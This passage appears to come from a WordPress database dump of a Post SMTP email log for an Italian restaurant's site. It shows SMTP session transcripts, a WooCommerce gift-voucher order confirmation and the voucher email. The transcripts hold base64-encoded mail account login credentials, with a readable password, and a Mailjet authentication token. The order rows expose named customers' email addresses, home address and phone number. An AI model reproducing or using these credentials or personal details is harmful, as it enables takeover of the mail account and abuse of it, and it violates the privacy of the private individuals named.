04:52:44 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<Filos4@libero.it>\r\n250 Accepted\r\nRCPT TO:<marcello.manduchi@hotmail.it>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: Filos4@libero.it\r\nMessage-Id: <7a801987978eb6314079fdfc93d812c7@ristorantesolymar.it>\r\nSubject: Sol Y Mar, ristorante a Riccione\r\nDate: Mon, 26 Oct 2020 08:52:44 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\n<!DOCTYPE html>=0A<html>=0A<head><meta http-equiv=3D\"Content-Type\" conte=\r\nnt=3D\"text/html; charset=3Dutf-8\"></head>=0A<body style=3D\"padding: 0;\">=\r\n=0A<table class=3D\"email-container\" border=3D\"0\" width=3D\"600px;\" cellsp=\r\nacing=3D\"0\" cellpadding=3D\"0\" align=3D\"center\" style=3D\"margin: 0 auto;=\r\n background-color: #ff9898; border-spacing: 10px;\">=0D=0A<tbody>=0D=0A<t=\r\nr>=0D=0A<td style=3D\"padding: 5px;\">=0D=0A<table class=3D\"email-containe=\r\nr\" border=3D\"0\" cellspacing=3D\"0\" cellpadding=3D\"0\" align=3D\"center\" sty=\r\nle=3D\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 1=\r\n0px 0px; border: 2px dashed #ffffff;\">=0D=0A<tbody>=0D=0A<tr>=0D=0A<td s=\r\ntyle=3D\"padding: 10px 0; text-align: left;\"><a style=3D\"font-weight: nor=\r\nmal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\r\n=3D\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar=\r\n-logo-150.png\" width=3D\"200px\" height=3D\"150px\" style=3D\"border: none; d=\r\nisplay: inline-block; font-size: 14px; font-weight: bold; height: auto;=\r\n outline: none; text-decoration: none; text-transform: capitalize; verti=\r\ncal-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>=0D=0A=\r\n<td style=3D\"padding: 10px 0; text-align: center;\"><img src=3D\"https://w=\r\nww.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=3D\"b=\r\norder: none; display: inline-block; font-size: 14px; font-weight: bold;=\r\n height: auto; outline: none; text-decoration: none; text-transform: cap=\r\nitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"><=\r\n/td>=0D=0A</tr>=0D=0A<tr>=0D=0A<td class=3D\"img-block\" style=3D\"text-ali=\r\ngn: center; padding: 2px 0px;\"></td>=0D=0A</tr>=0D=0A</tbody>=0D=0A</tab=\r\nle>=0D=0A</td>=0D=0A</tr>=0D=0A</tbody>=0D=0A</table>=0D=0A=C2=A0=0D=0A<=\r\ntable class=3D\"email-container\" border=3D\"0\" width=3D\"600px;\" cellspacin=\r\ng=3D\"0\" cellpadding=3D\"0\" align=3D\"center\" style=3D\"background-color: #f=\r\nfffff; margin: auto;\">=0D=0A<tbody>=0D=0A<tr>=0D=0A<td bgcolor=3D\"#fffff=\r\nf\" style=3D\"text-align: center; font-family: sans-serif; font-size: 15px=\r\n; line-height: 20px; color: #555555;\"></td>=0D=0A</tr>=0D=0A<!-- -->=0D=\r\n=0A<tr>=0D=0A<td align=3D\"center\" valign=3D\"top\" bgcolor=3D\"#ffffff\" sty=\r\nle=3D\"padding: 15px;\">=0D=0A<table border=3D\"0\" width=3D\"100%;\" cellspac=\r\ning=3D\"0\" cellpadding=3D\"0\" style=3D\"background-color: #ffffff;\">=0D=0A<=\r\ntbody>=0D=0A<tr>=0D=0A<td class=3D\"stack-column-center\" style=3D\"vertica=\r\nl-align: top; width: 50%;\">=0D=0A<table border=3D\"0\" cellspacing=3D\"0\" c=\r\nellpadding=3D\"0\" style=3D\"background-color: #ffffff;\">=0D=0A<tbody>=0D=\r\n=0A<tr>=0D=0A<td style=3D\"padding: 10px; text-align: center; width: 50%;=\r\n\"><img src=3D\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_br=\r\nowse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=3D\"100%\" style=3D\"=\r\nborder: none; display: inline-block; font-size: 14px; font-weight: bold;=\r\n height: auto; outline: none; text-decoration: none; text-transform: cap=\r\nitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"><=\r\n/td>=0D=0A</tr>=0D=0A</tbody>=0D=0A</table>=0D=0A</td>=0D=0A<td class=3D=\r\n\"stack-column-center\" style=3D\"vertical-align: top;\">=0D=0A<table border=\r\n=3D\"0\" width=3D\"100%\" cellspacing=3D\"0\" cellpadding=3D\"0\" style=3D\"backg=\r\nround-color: #ffffff;\">=0D=0A<tbody>=0D=0A<tr>=0D=0A<td class=3D\"center-=\r\non-narrow\" style=3D\"font-family: sans-serif; font-size: 15px; line-heigh=\r\nt: 20px; color: #555555; padding: 10px; text-align: left; word-break: br=\r\neak-word;\">=0D=0A<p style=3D\"min-height: 180px;\">Ti doniamo un piccolo m=\r\nomento di piacere, per ringraziarti del tempo e delle cure che ci hai de=\r\ndicato in questi mesi. Grazie zio!</p>=0D=0A</td>=0D=0A</tr>=0D=0A<tr>=\r\n=0D=0A<td style=3D\"padding: 0 10px; color: #373737;\">=0A<span style=3D\"f=\r\nloat: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span styl=\r\ne=3D\"width: 75%; float: left; word-break: break-all;\">Amalia e Riccardo=\r\n Manduchi</span>=0A</td>=0D=0A</tr>=0D=0A<tr>=0D=0A<td style=3D\"padding:=\r\n 5px 10px; color: #373737;\">=0A<span style=3D\"float: left; padding: 0 3%=\r\n 0 0; text-align: right;\">A :</span><span style=3D\"width: 75%; float: le=\r\nft; word-break: break-all;\">Filippo Saulle</span>=0A</td>=0D=0A</tr>=0D=\r\n=0A<tr>=0D=0A<td style=3D\"padding: 5px 10px; color: #373737;\">=0D=0A<h3=\r\n style=3D\"color: #557da1; display: block; font-weight: bold; line-height=\r\n: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-fami=\r\nly: Arial, Helvetica, sans-serif;\"><span class=3D\"woocommerce-Price-amou=\r\nnt amount\"><bdi>100,00<span class=3D\"woocommerce-Price-currencySymbol\">=\r\n=E2=82=AC</span></bdi></span></h3>=0D=0A</td>=0D=0A</tr>=0D=0A</tbody>=\r\n=0D=0A</table>=0D=0A</td>=0D=0A</tr>=0D=0A</tbody>=0D=0A</table>=0D=0A</=\r\ntd>=0D=0A</tr>=0D=0A<tr>=0D=0A<td valign=3D\"middle\" style=3D\"text-align:=\r\n center; background-color: #ffd5d5; padding: 10px;\">=0D=0A<div>=0D=0A<ta=\r\nble border=3D\"0\" width=3D\"100%\" cellspacing=3D\"0\" cellpadding=3D\"0\" alig=\r\nn=3D\"center\" style=3D\"background-color: #ffffff; border-spacing: 20px; b=\r\norder: 2px dashed #ffffff;\">=0D=0A<tbody>=0D=0A<tr>=0D=0A<td valign=3D\"m=\r\niddle\" style=3D\"padding: 10px 0px; font-family: sans-serif; line-height:=\r\n 20px; color: #ff9898; text-align: center; border: 3px;\">=0D=0A<h2 style=\r\n=3D\"color: #557da1; display: block; font-weight: bold; line-height: 130%=\r\n; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-se=\r\nrif; font-size: 15px; text-align: center;\">Codice Coupon</h2>=0D=0A<p st=\r\nyle=3D\"font-size: 25px; font-weight: bold; margin: 0px; text-align: cent=\r\ner;\"><img class=3D\"mwb_wgm_coupon_img\" id=3D\"1603656083www.ristorantesol=\r\nymar.it\" src=3D\"https://www.ristorantesolymar.it/wp-content/uploads/qrco=\r\nde_barcode/mwb__1603656083solymarcouponB4WIL.png\" style=3D\"border: none;=\r\n display: inline-block; font-size: 14px; font-weight: bold; height: auto=\r\n; outline: none; text-decoration: none; text-transform: capitalize; vert=\r\nical-align: middle; margin-right: 10px; max-width: 100%;\"></p>=0D=0A<spa=\r\nn style=3D\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Sca=\r\ndenza. 23/04/2021)</span>=0A</td>=0D=0A</tr>=0D=0A</tbody>=0D=0A</table>=\r\n=0D=0A</div>=0A</td>=0D=0A</tr>=0D=0A<tr>=0D=0A<td style=3D\"text-align:=\r\n center; padding: 15px; color: #ffffff; background-color: #ff9898; font-=\r\nsize: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolam=\r\nento dell\'utilizzo dei Coupon / Buoni regali sul <a href=3D\"https://www.=\r\nristorantesolymar.it/info-privacy/\" style=3D\"color: #557da1; font-weight=\r\n: normal; text-decoration: underline;\">sito</a>=0A</td>=0D=0A</tr>=0D=0A=\r\n</tbody>=0D=0A</table>=0A</body>=0A</html>=0A\r\n.\r\n250 OK id=1kWyFA-0007sq-Aj\r\n'),(22039,1161,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22040,1161,'success',''),(22041,1161,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22042,1161,'to_header','marcello.manduchi@hotmail.it'),(22043,1161,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22044,1161,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22045,1161,'original_to','[\"marcello.manduchi@hotmail.it\"]'),(22046,1161,'original_subject','Il tuo ordine su Sol Y Mar, ristorante a Riccione è stato ricevuto!'),(22047,1161,'original_message','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Grazie per il tuo ordine</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Ciao Marcello,</p>\n<p style=\"margin: 0 0 16px;\">Ti informiamo che abbiamo ricevuto il tuo ordine #1141 ed è in fase di elaborazione.</p>\n\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	[Ordine #1141] (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n				<p style=\"margin: 0 0 16px;\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Grazie per aver usato www.ristorantesolymar.it.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22048,1161,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(22049,1161,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:52:49 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22050,1162,'solution','Not found, check status column for more info.'),(22051,1162,'success','1'),(22052,1162,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22053,1162,'to_header','marcello.manduchi@hotmail.it'),(22054,1162,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22055,1162,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22056,1162,'original_to','[\"marcello.manduchi@hotmail.it\"]'),(22057,1162,'original_subject','Il tuo ordine su Sol Y Mar, ristorante a Riccione è stato ricevuto!'),(22058,1162,'original_message','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Grazie per il tuo ordine</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Ciao Marcello,</p>\n<p style=\"margin: 0 0 16px;\">Ti informiamo che abbiamo ricevuto il tuo ordine #1141 ed è in fase di elaborazione.</p>\n\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	[Ordine #1141] (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n				<p style=\"margin: 0 0 16px;\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													